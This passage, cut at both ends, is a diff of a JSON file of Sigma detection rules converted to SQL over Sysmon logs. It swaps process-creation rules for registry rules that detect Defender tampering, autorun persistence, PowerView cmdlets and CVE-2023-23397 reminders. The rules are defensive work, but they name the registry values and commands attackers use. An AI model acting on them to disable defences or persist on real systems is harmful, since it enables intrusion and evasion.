'\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' 
AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_disable_administrative_share.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook Task/Note Reminder Received", + "id": "fc06e655-d98c-412f-ac76-05c2698b1cb2", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Legitimate reminders received for a task or a note will also trigger this rule." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Tasks\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Notes\\\\%' ESCAPE '\\') AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software 
automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' 
ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE 
'\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", - "author": "bohops", + 
"description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" ], - "filename": 
"proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", - "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "author": "frack113", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other 
users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Legitimate software automatically (mostly, during installation) sets up autorun keys 
for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" }, { - "title": "Potential UAC Bypass Via Sdclt.EXE", - "id": "40f9af16-589d-4984-b78d-8c2aec023197", - "status": "test", - "description": "A General detection for sdclt being spawned as an elevated process. 
This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "status": "experimental", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1548.002" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_sdclt.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", - "id": "b66474aa-bd92-4333-a16c-298155b120df", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to 
disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", - "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_schtasks_powershell_persistence.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Kernel Dump Using Dtrace", - "id": 